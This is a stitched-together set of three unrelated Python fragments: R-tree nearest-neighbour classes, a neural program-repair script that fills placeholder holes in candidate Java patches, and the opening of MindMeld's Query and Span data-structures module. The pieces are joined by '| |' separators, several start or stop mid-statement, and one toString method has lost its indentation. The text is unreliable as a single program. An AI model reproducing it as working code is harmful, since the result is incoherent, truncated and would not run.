        return (self.close_item_pq).toList()

    # have special behavior for when no items are in queue
    def getFarthestCloseDistance(self):
        """Distance of the farthest retained point; +inf when empty."""
        if self.getNumCloseItems() == 0:
            return float("inf")
        else:
            result = (self.close_item_pq).peek()
            priority, item = result
            # priorities are (-distance, id-value) pairs, so undo the negation
            distance = -1 * priority[0]
            id_value = priority[1]
            return distance

    def addCloseItem(self, close_item):
        """Push a point (must expose getX/getY/getIDValue) onto the queue."""
        point = close_item
        query_point = self.query_point
        point_location = (point.getX(), point.getY())
        id_value = point.getIDValue()
        distance = getDistance(query_point, point_location)
        priority = (-1 * distance, id_value)
        (self.close_item_pq).push(close_item, priority)

    def removeCloseItem(self):
        """Evict the currently farthest retained point."""
        (self.close_item_pq).pop()

    def getNumCloseItems(self):
        return (self.close_item_pq).getSize()

    def addAndRemoveIfNecessary(self, close_item):
        # evict only when at capacity AND the incoming item is strictly
        # beyond the threshold relative to the current farthest point
        do_remove = self.isFull() == True and self.passesThresholdForFarthestCloseItem(close_item) == True
        self.addCloseItem(close_item)
        if do_remove == True:
            self.removeCloseItem()

    def isFull(self):
        return self.getNumCloseItems() >= self.k

    # returns True if distance for item 'close_item' is >= 0.001 that of the farthest close item
    def passesThresholdForFarthestCloseItem(self, close_item):
        distance = self.getFarthestCloseDistance()
        query_point = self.query_point
        point = close_item
        point_location = (point.getX(), point.getY())
        curr_distance = getDistance(query_point, point_location)
        return curr_distance > distance + 0.001

    def toString(self):
        close_items = self.getCloseItems()
        close_item_str_list = [str(x) for x in close_items]
        # BUG FIX: the original called string.join(list, " ") -- the Python 2
        # 'string' module function, which was never imported and no longer
        # exists in Python 3; str.join is the portable equivalent.
        close_item_str = " ".join(close_item_str_list)
        result_str = close_item_str + " " + str(self.getFarthestCloseDistance())
        return result_str
# internal nodes have entries
# have one-to-one relationship between nodes and entries
class RTreeNode:
    """R-tree node that stores its entries keyed by child node.

    Keying by child makes addEntry idempotent, which delete() relies on.
    m and M are the minimum/maximum entry counts per node.
    """

    def __init__(self, parent, entries, is_leaf):
        self.parent = parent
        self.is_leaf = is_leaf
        self.m = 8
        self.M = 16
        self.child_to_entry_dict = {}
        for entry in entries:
            curr_child = entry.getChild()
            (self.child_to_entry_dict)[curr_child] = entry

    def getParent(self):
        return self.parent

    def getEntries(self):
        # BUG FIX: dict.values() is a non-indexable view on Python 3, which
        # broke 'entries[index]' in retrieveEntryForChild(); return a list
        return list((self.child_to_entry_dict).values())

    def getEntryForChild(self, child_node):
        return (self.child_to_entry_dict)[child_node]

    def getChildren(self):
        # list for the same Python 3 view-object reason as getEntries()
        return list((self.child_to_entry_dict).keys())

    def getNumEntries(self):
        return len(self.child_to_entry_dict)

    def getNumChildren(self):
        # one-to-one node/entry relationship, so the counts coincide
        return self.getNumEntries()

    def setParent(self, node):
        self.parent = node

    def isNonTraditionalLeafNode(self):
        # childless root, or a node all of whose children are themselves empty
        is_non_traditional_leaf_node = (self.getParent() == None and self.getNumChildren() == 0) or (self.getNumChildren() != 0 and False not in [x.getChild().getNumEntries() == 0 for x in self.getEntries()])
        return is_non_traditional_leaf_node

    def isLeafNode(self):
        # traditional definition: a node with no children
        # (removed an unreachable 'return is_leaf_node' statement that
        # followed this return and referenced an undefined name)
        return self.getNumChildren() == 0

    def setIsLeafNode(self, is_leaf):
        self.is_leaf = is_leaf

    def addEntry(self, entry):
        # idempotent: re-adding an entry for the same child overwrites it
        curr_child = entry.getChild()
        (self.child_to_entry_dict)[curr_child] = entry

    # entry must match exactly
    def removeEntry(self, entry):
        curr_child = entry.getChild()
        (self.child_to_entry_dict).pop(curr_child)

    def getMinimumNumEntriesPerNode(self):
        return self.m

    def getMaximumNumEntriesPerNode(self):
        return self.M

    def isFull(self):
        return self.getNumEntries() >= self.getMaximumNumEntriesPerNode()

    def isUnderfull(self):
        return self.getNumEntries() < self.getMinimumNumEntriesPerNode()

    def retrieveEntryForChild(self, node):
        """Return the entry whose child is 'node' (linear scan)."""
        entries = self.getEntries()
        children = [x.getChild() for x in entries]
        index = children.index(node)
        chosen_entry = entries[index]
        return chosen_entry

    def toString(self):
        return str(self.getEntries())
# an entry is effectively an (mbr, child) pair
# mbr may be composite or raw
class RTreeEntry:
    """Pairs a bounding rectangle with the subtree (or leaf item) it covers."""

    def __init__(self, mbr, child):
        self.mbr = mbr
        self.child = child

    def getMBR(self):
        return self.mbr

    def getChild(self):
        return self.child

    def setMBR(self, mbr):
        self.mbr = mbr

    def setChild(self, node):
        self.child = node
# x goes from left (negative) to right (positive)
# y goes from top (negative) to bottom (positive)
class MBR:
    # Minimum bounding rectangle, stored as its upper-left and lower-right
    # corner points; each point is an (x, y) tuple.
    def __init__(self, upper_left, lower_right):
        self.upper_left = upper_left
        self.lower_right = lower_right
    # type probes; raw/composite variants (defined elsewhere in the file)
    # are expected to override these
    def isRaw(self):
        return False
    def isComposite(self):
        return False
    def getUpperLeft(self):
        return self.upper_left
    def getLowerRight(self):
        return self.lower_right
    def getArea(self):
        # width * height; non-negative as long as lower_right dominates
        # upper_left in both coordinates
        upper_left = self.getUpperLeft()
        lower_right = self.getLowerRight()
        x1, y1 = upper_left
        x2, y2 = lower_right
        side1_length = x2 - x1
        side2_length = y2 - y1
        area = side1_length * side2_length
        return area
    # require that base_mbr is composite and mbr is raw or composite
    # return a composite MBR object
    @staticmethod
    def getEnlargedMBR(base_mbr, mbr):
        # union rectangle: component-wise min over upper-left corners and
        # max over lower-right corners of both rectangles
        mbr_list = [base_mbr, mbr]
        upper_left_points = [x.getUpperLeft() for x in mbr_list]
        lower_right_points = [x.getLowerRight() for x in mbr_list]
        points = upper_left_points + lower_right_points
        x_values = [x[0] for x in points]
        y_values = [x[1] for x in points]
        min_x_value = min(x_values)
        max_x_value = max(x_values)
        min_y_value = min(y_values)
        max_y_value = max(y_values)
        upper_left_point = (min_x_value, min_y_value)
        lower_right_point = (max_x_value, max_y_value)
        # NOTE(review): getMBRList()/CompositeMBR are defined elsewhere in
        # the file; per the comment above, base_mbr must be composite
        result_mbr_list = base_mbr.getMBRList() + [mbr]
        mbr = CompositeMBR(upper_left_point, lower_right_point, result_mbr_list)
        return mbr
    @staticmethod
    def getAreaEnlargement(base_mbr, mbr):
        # growth in area of base_mbr if extended to also cover mbr
        base_mbr_area = base_mbr.getArea()
        enlarged_mbr = MBR.getEnlargedMBR(base_mbr, mbr)
        enlarged_mbr_area = enlarged_mbr.getArea()
        area_change = enlarged_mbr_area - base_mbr_area
        return area_change
    @staticmethod
    def doOverlap(mbr_a, mbr_b):
        # axis-aligned rectangle intersection test; touching edges count
        # as overlapping (all comparisons are inclusive)
        upper_left_a = mbr_a.getUpperLeft()
        lower_right_a = mbr_a.getLowerRight()
        upper_left_b = mbr_b.getUpperLeft()
        lower_right_b = mbr_b.getLowerRight()
        x1_a, y1_a = upper_left_a
        x2_a, y2_a = lower_right_a
        x1_b, y1_b = upper_left_b
        x2_b, y2_b = lower_right_b
        do_overlap = x1_a <= x2_b and x2_a >= x1_b and y1_a <= y2_b and y2_a >= y1_b
        return do_overlap
def toString(self):
upper_left = self.getUpperLeft()
lower_right = self.getLowerRight()
x1, y1 = upper_left
x2, y2 = lower_right
return "[" + str(x1) + ", " + str(y1) + ", " + str(x2) + ", " + | |
x.father = node.father
if change:
node = Node('root', -1)
node.child.append(copynode)
copynode.father = node
ans.solveroot = node#copynode
ans.type = type
#print(node.printTree(ans.solveroot))
else:
ans.solveroot = ans.root
ans.type = type
#print(copynode.printTree(copynode))
#assert(0)
return
import re
def replaceVar(root, rrdict):
    """Rename tree nodes via rrdict; return False if an unresolved placeholder leaf remains.

    Placeholder leaves are variables named like loc0/par3 that were not
    mapped back to a concrete name.
    """
    if root.name in rrdict:
        root.name = rrdict[root.name]
    elif len(root.child) == 0:
        # BUG FIX: the original patterns 'loc%d'/'par%d' used printf-style
        # %d, which is not a regex construct, so placeholder names such as
        # 'loc0' were never detected; \d+ matches the numeric suffix.
        if re.match(r'loc\d+', root.name) is not None or re.match(r'par\d+', root.name) is not None:
            return False
    ans = True
    for x in root.child:
        ans = ans and replaceVar(x, rrdict)
    return ans
def getUnknown(root):
    """Collect the nodes named 'unknown' in the tree rooted at root.

    A matching node is returned immediately, without descending into it.
    """
    if root.name == 'unknown':
        return [root]
    found = []
    for subtree in root.child:
        found.extend(getUnknown(subtree))
    return found
def solveUnknown(ans, vardic, typedic, classcontent, sclassname, mode):
    """Instantiate the single 'unknown' placeholder in a candidate patch tree.

    Substitutes every type-compatible field/method of the receiver class
    (looked up in the parsed ``classcontent`` index) and returns the list
    of printable patch strings produced; [] means no valid completion.

    NOTE(review): assumes the AST shape produced by the surrounding
    pipeline (``member``/``qualifier``/``arguments`` children, names
    suffixed with ``_ter``) -- confirm against the tree builder.
    """
    nodes = getUnknown(ans.solveroot)
    fans = []
    if len(nodes) >= 2:
        # more than one hole cannot be solved independently -- give up
        return []
    elif len(nodes) == 0:
        # nothing to fill in: the tree is already a complete patch
        #print(ans.root.printTree(ans.solveroot))
        return [ans.root.printTree(ans.solveroot)]
    else:
        #print(2)
        unknown = nodes[0]
        # --- case 1: the hole sits inside a method invocation ---
        if unknown.father.father and unknown.father.father.name == 'MethodInvocation':
            classname = ''
            args = []
            print('method')
            # resolve the receiver class from the qualifier, if any
            if unknown.father.name == 'member':
                for x in unknown.father.father.child:
                    if x.name == 'qualifier':
                        print(x.child[0].name, typedic)
                        if x.child[0].name in typedic:
                            classname = typedic[x.child[0].name]
                            break
                        else:
                            # fall back to the enclosing class's fields
                            if sclassname == 'org.jsoup.nodes.Element':
                                sclassname = 'org.jsoup.nodes.Node'
                            for f in classcontent[sclassname + '.java']['classes'][0]['fields']:
                                print(x.child[0].name, f['name'])
                                if f['name'] == x.child[0].name[:-4]:
                                    classname = f['type']
                                    break
            # collect the static types of the invocation's arguments
            for x in unknown.father.father.child:
                if x.name == 'arguments':
                    for y in x.child:
                        if y.name == 'MemberReference':
                            # NOTE(review): bare except keeps malformed
                            # argument subtrees from crashing the search
                            try:
                                if y.child[0].child[0].name in typedic:
                                    args.append(typedic[y.child[0].child[0].name])
                                else:
                                    #print(6, y.child[0].child[0].name)
                                    args.append('int')#return []
                            except:
                                #print('gg2')
                                return []
                        elif y.name == 'Literal':
                            if y.child[0].child[0].name == "<string>_er":
                                args.append("String")
                            else:
                                args.append("int")
                        else:
                            print('except')
                            return []
            print(7, classname)
            if classname == '':
                classbody = classcontent[sclassname + '.java']['classes']
            elif classname != '':
                if classname + ".java" not in classcontent:
                    #print(5, classname )
                    return []
                classbody = classcontent[classname + '.java']['classes']
            #print(5, sclassname, classbody, classname)
            #print(8)
            # when the hole is the qualifier, the expected field type comes
            # from the original (replaced) member's declaration
            if unknown.father.name == 'qualifier':
                vtype = ""
                for x in classbody[0]['fields']:
                    #print(x)
                    if x['name'] == ans.type[:-4]:
                        vtype = x['type']
                        break
            if 'IfStatement' in ans.getTreestr():
                # condition context: only boolean-producing completions fit
                if mode == 1 and len(ans.solveroot.child) == 1:
                    #print(ans.solveroot.printTree(ans.solveroot))
                    return []
                #print(ans.solveroot.printTree(ans.solveroot))
                if unknown.father.name == 'member':
                    for x in classbody[0]['methods']:
                        if len(x['params']) == 0 and x['type'] == 'boolean':
                            unknown.name = x['name'] + "_ter"
                            #print('gggg', unknown.printTree(ans.solveroot))
                            fans.append(unknown.printTree(ans.solveroot))
                elif unknown.father.name == 'qualifier':
                    for x in classbody[0]['fields']:
                        if x['type'] == vtype:
                            unknown.name = x['name'] + "_ter"
                            fans.append(unknown.printTree(ans.solveroot))
            else:
                #print("a", args)
                if mode == 0 and ans.root == ans.solveroot and len(args) == 0 and classname != 'EndTag':
                    return []
                otype = ""
                if classname == 'EndTag':
                    otype = "String"
                # replacement mode with a known original member: take the
                # expected return/argument types from its declaration
                if mode == 0 and ans.type != '':
                    args = []
                    if ans.type == "valid":
                        return []
                    for m in classbody[0]['methods']:
                        #print(m['name'])
                        if m['name'] == ans.type[:-4]:
                            otype = m['type']
                            for y in m['params']:
                                args.append(y['type'])
                            break
                #print(args, ans.type, 'o')
                if unknown.father.name == 'member':
                    #print(mode, ans.type, args)
                    for x in classbody[0]['methods']:
                        #print(x)
                        print(x['type'], otype, x['name'], ans.type)
                        if len(args) == 0 and len(x['params']) == 0:
                            if mode == 0 and x['type'] != otype:
                                continue
                            if mode == 1 and x['type'] is not None:
                                continue
                            #if mode == 1 and x['type'] != "null":
                            #    continue
                            unknown.name = x['name'] + "_ter"
                            #print('gggg', unknown.printTree(ans.solveroot))
                            fans.append(unknown.printTree(ans.solveroot))
                        #print(x['name'], x['type'], args)
                        if ans.type != '':
                            if mode == 0 and len(args) > 0 and x['type'] == otype:
                                targ = []
                                for y in x['params']:
                                    targ.append(y['type'])
                                if args == targ:
                                    unknown.name = x['name'] + "_ter"
                                    fans.append(unknown.printTree(ans.solveroot))
                        else:
                            #print(10)
                            if mode == 0 and len(args) > 0:
                                #print(11)
                                targ = []
                                for y in x['params']:
                                    targ.append(y['type'])
                                #print('p', targ, x['name'], x)
                                if args == targ and 'type' in x and x['type'] is None:
                                    unknown.name = x['name'] + "_ter"
                                    fans.append(unknown.printTree(ans.solveroot))
                elif unknown.father.name == 'qualifier':
                    if ans.type == 'valid':
                        return []
                    for x in classbody[0]['fields']:
                        if x['type'] == vtype:
                            unknown.name = x['name'] + "_ter"
                            fans.append(unknown.printTree(ans.solveroot))
                    # also try zero-argument getters of the right type, as a
                    # synthesized MethodInvocation subtree
                    for x in classbody[0]['methods']:
                        if x['type'] == vtype and len(x['params']) == 0:
                            tmpnode = Node('MethodInvocation', -1)
                            tmpnode1 = Node('member', -1)
                            tmpnode2 = Node(x['name'] + "_ter", -1)
                            tmpnode.child.append(tmpnode1)
                            tmpnode1.father = tmpnode
                            tmpnode1.child.append(tmpnode2)
                            tmpnode2.father = tmpnode1
                            unknown.name = " ".join(tmpnode.printTree(tmpnode).split()[:-1])#tmpnode.printTree(tmpnode)
                            fans.append(unknown.printTree(ans.solveroot))
        # --- case 2: the hole is a bare qualifier ---
        elif unknown.father.name == 'qualifier':
            classbody = classcontent[sclassname + '.java']['classes']
            vtype = ""
            for x in classbody[0]['fields']:
                if x['name'] == ans.type[:-4]:
                    vtype = x['type']
                    break
            #print(5, vtype)
            for x in classbody[0]['fields']:
                if x['type'] == vtype:
                    unknown.name = x['name'] + "_ter"
                    fans.append(unknown.printTree(ans.solveroot))
            for x in classbody[0]['methods']:
                if x['type'] == vtype and len(x['params']) == 0:
                    tmpnode = Node('MethodInvocation', -1)
                    tmpnode1 = Node('member', -1)
                    tmpnode2 = Node(x['name'] + "_ter", -1)
                    tmpnode.child.append(tmpnode1)
                    tmpnode1.father = tmpnode
                    tmpnode1.child.append(tmpnode2)
                    tmpnode2.father = tmpnode1
                    unknown.name = " ".join(tmpnode.printTree(tmpnode).split()[:-1])
                    fans.append(unknown.printTree(ans.solveroot))
        # --- case 3: the hole is a bare member access ---
        elif unknown.father.name == 'member':
            classname = ''
            if unknown.father.name == 'member':
                for x in unknown.father.father.child:
                    if x.name == 'qualifier':
                        if x.child[0].name in typedic:
                            classname = typedic[x.child[0].name]
                            break
                        else:
                            for f in classcontent[sclassname + '.java']['classes'][0]['fields']:
                                if f['name'] == x.child[0].name[:-4]:
                                    classname = f['type']
                                    break
                            # the qualifier may itself name a class
                            if x.child[0].name[:-4] + ".java" in classcontent:
                                classname = x.child[0].name[:-4]
            #print(0, classname, ans.type)
            if classname == '':
                classbody = classcontent[sclassname + '.java']['classes']
            elif classname != '':
                if classname + ".java" not in classcontent:
                    #print(5, classname )
                    return []
                classbody = classcontent[classname + '.java']['classes']
            vtype = ""
            #print('type', ans.type)
            for x in classbody[0]['fields']:
                if x['name'] == ans.type[:-4]:
                    vtype = x['type']
                    break
            # if the member access feeds an enclosing call, infer the
            # expected type from that call's parameter declaration
            if unknown.father.father.father.father and (unknown.father.father.father.father.name == 'MethodInvocation' or unknown.father.father.father.father.name == 'ClassCreator') and ans.type == "":
                mname = ""
                tname = ""
                if unknown.father.father.father.father.name == "MethodInvocation":
                    tname = 'member'
                else:
                    tname = 'type'
                for s in unknown.father.father.father.father.child:
                    if s.name == 'member' and tname == 'member':
                        mname = s.child[0].name
                    if s.name == 'type' and tname == 'type':
                        mname = s.child[0].child[0].child[0].name
                idx = unknown.father.father.father.child.index(unknown.father.father)
                #print(idx)
                if tname == 'member':
                    for f in classbody[0]['methods']:
                        if f['name'] == mname[:-4] and idx < len(f['params']):
                            vtype = f['params'][idx]['type']
                            print(vtype, f['name'])
                            break
                else:
                    if mname[:-4] + ".java" not in classcontent:
                        return []
                    for f in classcontent[mname[:-4] + ".java"]['classes'][0]['methods']:
                        #print(f['name'], f['params'], mname[:-4])
                        if f['name'] == mname[:-4] and idx < len(f['params']):
                            vtype = f['params'][idx]['type']
                            break
            if True:
                for x in classbody[0]['fields']:
                    #print(classname, x['type'], x['name'], vtype, ans.type)
                    if x['type'] == vtype or (x['type'] == 'double' and vtype == 'int'):# or vtype == "":
                        unknown.name = x['name'] + "_ter"
                        fans.append(unknown.printTree(ans.solveroot))
    return fans
def extarctmode(root):
    """Strip a leading mode-marker child from a decoded tree.

    The first child named 'modified' means replacement mode (0) and 'add'
    means insertion mode (1). Returns (mode, root) with the marker removed,
    or (0, None) when no recognizable marker is present.
    """
    if not root.child:
        return 0, None
    marker = root.child[0].name
    if marker == 'modified':
        mode = 0
    elif marker == 'add':
        mode = 1
    else:
        return 0, None
    print(root.printTree(root))
    root.child.pop(0)
    return mode, root
def solveone(data, model):#(treestr, prob, model, subroot, vardic, typedic, idx, idss, classname, mode):
    """Run the repair model over prepared bug instances and write candidate patches.

    For every beam-search output: extract the edit mode, apply the edit to the
    buggy subtree, map placeholder variables back to source names, fill the
    remaining 'unknown' hole via solveUnknown, de-duplicate, and dump the
    surviving patches to patchmu/<idss>.json.

    NOTE(review): relies on module-level ``args`` plus SumDataset/BeamSearch/
    applyoperater defined elsewhere; confirm their contracts there.
    """
    #os.environ["CUDA_VISIBLE_DEVICES"]="2, 3"
    #assert(len(data) <= 40)
    args.batch_size = 20
    dev_set = SumDataset(args, "test")
    dev_set.preProcessOne(data)#x = dev_set.preProcessOne(treestr, prob)
    #dev_set.nl = [treestr.split()]
    indexs = 0
    devloader = torch.utils.data.DataLoader(dataset=dev_set, batch_size=args.batch_size,
                                            shuffle=False, drop_last=False, num_workers=0)
    savedata = []
    # patch: dedup keys of the form str(mode) + code + str(line)
    patch = {}
    for x in tqdm(devloader):
        if indexs < 0:
            indexs += 1
            continue
        #print(indexs,indexs * args.batch_size, data[5]['oldcode'])
        #print(x[0][0], dev_set.data[0][idx])
        #assert(np.array_equal(x[0][0], dev_set.datam[0][4]))
        #assert(np.array_equal(x[1][0], dev_set.datam[1][4].toarray()))
        #assert(np.array_equal(x[2][0], dev_set.datam[8][4]))
        #assert(np.array_equal(x[3][0], dev_set.datam[9][4]))
        #print(data[indexs]['mode'], data[indexs]['oldcode'])
        ans = BeamSearch((x[0], x[1], None, None, None, None, None, None, x[2], x[3]), dev_set, model, 50, args.batch_size, indexs)
        for i in range(len(ans)):
            currid = indexs * args.batch_size + i
            idss = data[currid]['idss']
            subroot = data[currid]['subroot']
            # parsed class index for this bug id, plus shared fallback classes
            if os.path.exists("../result/%s.json" % idss):
                classcontent = json.load(open("../result/%s.json" % idss, 'r') )
            else:
                classcontent = []
            classcontent.extend(json.load(open("temp.json", 'r')))
            rrdicts = {}
            for x in classcontent:
                rrdicts[x['filename']] = x
                if 'package_name' in x:
                    rrdicts[x['package_name'] + "." + x['filename']] = x
            vardic = data[currid]['vardic']
            typedic = data[currid]['typedic']
            classname = data[currid]['classname']#data[currid]['classname'].split(".")[-1]
            #print(classname)
            #assert(0)
            mode = data[currid]['mode']
            # invert vardic so placeholder names map back to source names
            rrdict = {}
            for x in vardic:
                rrdict[vardic[x]] = x
            for j in range(len(ans[i])):
                # cap the beams considered per instance (Lang-33 is exempt)
                if j > 30 and idss != 'Lang-33':
                    break
                mode, ans[i][j].root = extarctmode(ans[i][j].root)
                if ans[i][j].root is None:
                    continue
                print(j, ans[i][j].root.printTree(ans[i][j].root))
                applyoperater(ans[i][j], subroot)
                #print(j, ans[i][j].root.printTree(ans[i][j].solveroot))
                an = replaceVar(ans[i][j].solveroot, rrdict)
                #print(j, ans[i][j].root.printTree(ans[i][j].solveroot))
                if not an:
                    continue
                #print(7, ans[i][j].type)
                try:
                    tcodes = solveUnknown(ans[i][j], vardic, typedic, rrdicts, classname, mode)
                except Exception as e:
                    traceback.print_exc()
                    tcodes = []
                print(tcodes)
                for code in tcodes:
                    if code.split(" ")[0] != 'root':
                        assert(0)
                    # keep only the first occurrence of each (mode, code, line)
                    if str(mode) + code + str(data[currid]['line']) not in patch:
                        patch[str(mode) + code + str(data[currid]['line'])] = 1
                    else:
                        continue
                    savedata.append({'id':currid, 'idss':idss, 'precode':data[currid]['precode'], 'aftercode':data[currid]['aftercode'], 'oldcode':data[currid]['oldcode'], 'filename':data[currid]['filepath'], 'mode':mode, 'code':code, 'line':data[currid]['line'], 'isa':data[currid]['isa']})
        indexs += 1
    #for x in savedata:
    #    print(x['oldcode'], x['code'])
    #exit(0)
    #f.write(" ".join(ans.ans[1:-1]))
    #f.write("\n")
    #f.flush()#print(ans)
    #print(x[0][0], dev_set.data[0][idx])
    #assert(np.array_equal(x[0][0], dev_set.data[0][idx]))
    #assert(np.array_equal(x[1][0], dev_set.data[1][idx].toarray()))
    #assert(np.array_equal(x[2][0], dev_set.data[8][idx]))
    #assert(np.array_equal(x[3][0], dev_set.data[9][idx]))
    open('patchmu/%s.json' % data[0]['idss'], 'w').write(json.dumps(savedata, indent=4))
def solveone2(data, model):#(treestr, prob, model, | |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015 Cisco Systems, Inc. and others. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains a collection of the core data structures used in MindMeld."""
import logging
TEXT_FORM_RAW = 0
TEXT_FORM_PROCESSED = 1
TEXT_FORM_NORMALIZED = 2
TEXT_FORMS = [TEXT_FORM_RAW, TEXT_FORM_PROCESSED, TEXT_FORM_NORMALIZED]
logger = logging.getLogger(__name__)
# The date keys are extracted from here
# https://github.com/wit-ai/duckling_old/blob/a4bc34e3e945d403a9417df50c1fb2172d56de3e/src/duckling/time/obj.clj#L21 # noqa E722
TIME_GRAIN_TO_ORDER = {
"year": 8,
"quarter": 7,
"month": 6,
"week": 5,
"day": 4,
"hour": 3,
"minute": 2,
"second": 1,
"milliseconds": 0,
}
def _sort_by_lowest_time_grain(system_entities):
return sorted(
system_entities,
key=lambda query_entity: TIME_GRAIN_TO_ORDER[
query_entity.entity.value["grain"]
],
)
class Bunch(dict):
    """A dict subclass whose keys are also readable and writable as attributes.

    Modeled on scikit-learn's Bunch.

    >>> b = Bunch(a=1, b=2)
    >>> b['b']
    2
    >>> b.b
    2
    >>> b.a = 3
    >>> b['a']
    3
    >>> b.c = 6
    >>> b['c']
    6
    """

    def __init__(self, **kwargs):
        super().__init__(kwargs)

    def __setattr__(self, name, value):
        self[name] = value

    def __getattr__(self, name):
        # Only invoked when normal attribute lookup fails, so the regular
        # dict machinery keeps working; missing keys become AttributeError.
        if name in self:
            return self[name]
        raise AttributeError(name)

    def __dir__(self):
        return self.keys()

    def __setstate__(self, state):
        # no-op: unpickling restores contents through the dict protocol
        pass
class Span:
    """A contiguous, inclusive range of indices into some original text.

    Attributes:
        start (int): index in the original text where the span begins
        end (int): index in the original text where the span ends (inclusive)
    """

    __slots__ = ["start", "end"]

    def __init__(self, start, end):
        assert start <= end, "Span 'start' must be less than or equal to 'end'"
        self.start = start
        self.end = end

    def to_dict(self):
        """Return the span as a {'start': ..., 'end': ...} dictionary."""
        return {"start": self.start, "end": self.end}

    def slice(self, obj):
        """Return the portion of *obj* covered by this span.

        Args:
            obj: Any sliceable object (string, list, ...)

        Returns:
            The slice of *obj* from start through end, inclusive
        """
        stop = self.end + 1
        return obj[self.start:stop]

    def shift(self, offset):
        """Return a new Span with both endpoints moved by *offset*."""
        return Span(self.start + offset, self.end + offset)

    def __iter__(self):
        return iter(range(self.start, self.end + 1))

    def __len__(self):
        return self.end - self.start + 1

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return NotImplemented
        return (self.start, self.end) == (other.start, other.end)

    def __ne__(self, other):
        if not isinstance(other, self.__class__):
            return NotImplemented
        return not self.__eq__(other)

    def __repr__(self):
        return f"{type(self).__name__}(start={self.start}, end={self.end})"
class Query:
    """The query object is responsible for processing and normalizing raw user text input so that
    classifiers can deal with it. A query stores three forms of text: raw text, processed text, and
    normalized text. The query object is also responsible for translating text ranges across these
    forms.
    Attributes:
        raw_text (str): the original input text
        processed_text (str): the text after it has been preprocessed. The pre-processing happens
            at the application level and is generally used for special characters
        normalized_tokens (tuple of str): a list of normalized tokens
        system_entity_candidates (tuple): A list of system entities extracted from the text
        locale (str, optional): The locale representing the ISO 639-1 language code and \
            ISO3166 alpha 2 country code separated by an underscore character.
        language (str, optional): The language code representing ISO 639-1 language codes.
        time_zone (str): The IANA id for the time zone in which the query originated
            such as 'America/Los_Angeles'
        timestamp (long, optional): A unix timestamp used as the reference time
            If not specified, the current system time is used. If `time_zone`
            is not also specified, this parameter is ignored
        stemmed_tokens (list): A sequence of stemmed tokens for the query text
    """

    # TODO: look into using __slots__

    def __init__(
        self,
        raw_text,
        processed_text,
        normalized_tokens,
        char_maps,
        locale=None,
        language=None,
        time_zone=None,
        timestamp=None,
        stemmed_tokens=None,
    ):
        """Creates a query object
        Args:
            raw_text (str): the original input text
            processed_text (str): the input text after it has been preprocessed
            normalized_tokens (list of dict): List tokens outputted by
                a tokenizer
            char_maps (dict): Mappings between character indices in raw,
                processed and normalized text
        """
        self._normalized_tokens = normalized_tokens
        norm_text = " ".join([t["entity"] for t in self._normalized_tokens])
        # the three text forms, indexed by the TEXT_FORM_* constants
        self._texts = (raw_text, processed_text, norm_text)
        self._char_maps = char_maps
        self.system_entity_candidates = ()
        self._locale = locale
        self._language = language
        self._time_zone = time_zone
        self._timestamp = timestamp
        self.stemmed_tokens = stemmed_tokens or tuple()

    @property
    def text(self):
        """The original input text"""
        return self._texts[TEXT_FORM_RAW]

    @property
    def processed_text(self):
        """The input text after it has been preprocessed"""
        return self._texts[TEXT_FORM_PROCESSED]

    @property
    def normalized_text(self):
        """The normalized input text"""
        return self._texts[TEXT_FORM_NORMALIZED]

    @property
    def stemmed_text(self):
        """The stemmed input text"""
        return " ".join(self.stemmed_tokens)

    @property
    def normalized_tokens(self):
        """The tokens of the normalized input text"""
        return tuple((token["entity"] for token in self._normalized_tokens))

    @property
    def language(self):
        """Language of the query specified using a 639-2 code."""
        return self._language

    @property
    def locale(self):
        """The locale representing the ISO 639-1/2 language code and
        ISO3166 alpha 2 country code separated by an underscore character."""
        return self._locale

    @property
    def time_zone(self):
        """The IANA id for the time zone in which the query originated
        such as 'America/Los_Angeles'.
        """
        return self._time_zone

    @property
    def timestamp(self):
        """A unix timestamp for when the time query was created. If `time_zone` is None,
        this parameter is ignored.
        """
        return self._timestamp

    def get_text_form(self, form):
        """Programmatically retrieves text by form
        Args:
            form (int): A valid text form (TEXT_FORM_RAW, TEXT_FORM_PROCESSED, or
                TEXT_FORM_NORMALIZED)
        Returns:
            str: The requested text
        """
        return self._texts[form]

    def get_system_entity_candidates(self, sys_types):
        """
        Args:
            sys_types (set of str): A set of entity types to select
        Returns:
            list: Returns candidate system entities of the types specified
        """
        return [e for e in self.system_entity_candidates if e.entity.type in sys_types]

    def transform_span(self, text_span, form_in, form_out):
        """Transforms a text range from one form to another.
        Args:
            text_span (Span): the text span being transformed
            form_in (int): the input text form. Should be one of TEXT_FORM_RAW, TEXT_FORM_PROCESSED
                or TEXT_FORM_NORMALIZED
            form_out (int): the output text form. Should be one of TEXT_FORM_RAW,
                TEXT_FORM_PROCESSED or TEXT_FORM_NORMALIZED
        Returns:
            tuple: the equivalent range of text in the output form
        """
        return Span(
            self.transform_index(text_span.start, form_in, form_out),
            self.transform_index(text_span.end, form_in, form_out),
        )

    def transform_index(self, index, form_in, form_out):
        """Transforms a text index from one form to another.
        Args:
            index (int): the index being transformed
            form_in (int): the input form. should be one of TEXT_FORM_RAW
            form_out (int): the output form
        Returns:
            int: the equivalent index of text in the output form
        """
        if form_in not in TEXT_FORMS or form_out not in TEXT_FORMS:
            raise ValueError("Invalid text form")

        # forms are ordered RAW < PROCESSED < NORMALIZED, so walk the index
        # one adjacent form at a time in the appropriate direction
        if form_in > form_out:
            while form_in > form_out:
                index = self._unprocess_index(index, form_in)
                form_in -= 1
        else:
            while form_in < form_out:
                index = self._process_index(index, form_in)
                form_in += 1
        return index

    def _process_index(self, index, form_in):
        # maps an index one step "forward" (towards the normalized form)
        if form_in == TEXT_FORM_NORMALIZED:
            raise ValueError(
                "'{}' form cannot be processed".format(TEXT_FORM_NORMALIZED)
            )
        mapping_key = (form_in, (form_in + 1))
        try:
            mapping = self._char_maps[mapping_key]
        except KeyError:
            # mapping doesn't exist -> use identity
            return index
        # None for mapping means 1-1 mapping
        try:
            return mapping[index] if mapping else index
        except KeyError:
            raise ValueError("Invalid index {}".format(index))

    def _unprocess_index(self, index, form_in):
        # maps an index one step "backward" (towards the raw form)
        if form_in == TEXT_FORM_RAW:
